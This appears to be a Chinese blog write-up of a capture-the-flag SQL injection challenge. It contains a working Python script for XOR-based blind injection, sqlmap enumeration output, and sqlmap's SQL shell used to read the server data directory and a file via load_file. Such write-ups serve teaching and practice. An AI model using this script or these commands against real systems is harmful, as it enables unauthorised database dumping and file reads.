0
点赞
收藏
分享

微信扫一扫

记一次站库分离的sql注入题目(sql-shell的使用)

这里进行模糊测试,发现过滤了一大堆符号,但发现id为1和0时login name不同

考虑异或的sql盲注

附上我的脚本

import requests

flag = ""
for i in range(1, 2000):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:

        url="http://*********/SQL%20Injection/?id=1^(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1})".format(i,mid)

        res = requests.get(url=url)
        if 'Taka' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
       
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)

跑出了表名

爆列名

id,name,Host,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,password_last_changed,password_lifetime,account_locked,id,name,id,name,password

跑了许久,爆了一大堆列名,发现并没有我们想要的flag,尝试使用sqlmap来爆表

available databases [14]:
[*] information_schema
[*] lts
[*] mysql
[*] performance_schema
[*] qhr
[*] qzw
[*] sys
[*] syy
[*] tempdb
[*] Weikl
[*] wry
[*] wzx
[*] youki
[*] yoursql

爆出了14个库

Database: Weikl
[2 tables]
+----------------+
| user           |
| flag           |
+----------------+

Database: mysql
[18 tables]
+----------------+
| user           |
| columns_priv   |
| db             |
| engine_cost    |
| event          |
| func           |
| general_log    |
| help_keyword   |
| help_topic     |
| plugin         |
| proc           |
| procs_priv     |
| proxies_priv   |
| server_cost    |
| servers        |
| slow_log       |
| tables_priv    |
| time_zone      |
+----------------+

Database: sys
[12 tables]
+----------------+
| session        |
| version        |
| host_summary   |
| latest_file_io |
| metrics        |
| processlist    |
| sys_config     |
| user_summary   |
| x$host_summary |
| x$processlist  |
| x$session      |
| x$user_summary |
+----------------+

Database: syy
[1 table]
+----------------+
| usersql        |
+----------------+

Database: tempdb
[1 table]
+----------------+
| user           |
+----------------+

Database: wry
[1 table]
+----------------+
| dataform       |
+----------------+

Database: wzx
[1 table]
+----------------+
| id             |
+----------------+

Database: youki
[1 table]
+----------------+
| user           |
+----------------+

Database: yoursql
[1 table]
+----------------+
| flag           |
+----------------+

发现这里的列名中有我们想要的flag

查查数据

Database: Weikl
Table: flag
[1 entry]
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| flag                                                                                                                                                                                                                                                                                               |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 0x253537253537253339253331253439253438253532253666253631253537253335253732253439253438253532253666253631253538253464253637253631253538253464253637253561253664253738253638253561253761253338253637253536253437253638253730253632253664253733253637253539253537253634253638253631253537253334253364 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

 八进制

尝试转化为字符串

我这里是在BP中解密的

url解密

BASE64解密

 不是这个,尝试另外一个

Database: yoursql
Table: flag
[1 entry]
+--------------------------------------------------------------------------------------------------------------------+
| flag                                                                                                               |
+--------------------------------------------------------------------------------------------------------------------+
| 0x466c616773206172652073746f726564206173207465787420756e646572207468652064617461626173652073746f726167652070617468 |
+--------------------------------------------------------------------------------------------------------------------+

一眼十六进制,尝试十六进制转换字符串

都不是

但这里给出了hint

我们推测flag以txt文本的形式存储在数据库的存储路径下,使用sqlmap的交互式shell

这里我们使用-sql-shell因为使用-os-shell爆不出来网站的绝对路径无法使用

>python3 sqlmap.py -u http://********/SQL%20Injection/?id=1 -sql-shell
 select @@datadir

 得到数据库存储路径

读文件

 select load_file('/var/lib/mysql/flag.txt')

 得到flag,再对里面进行base64解密

 

举报

相关推荐

0 条评论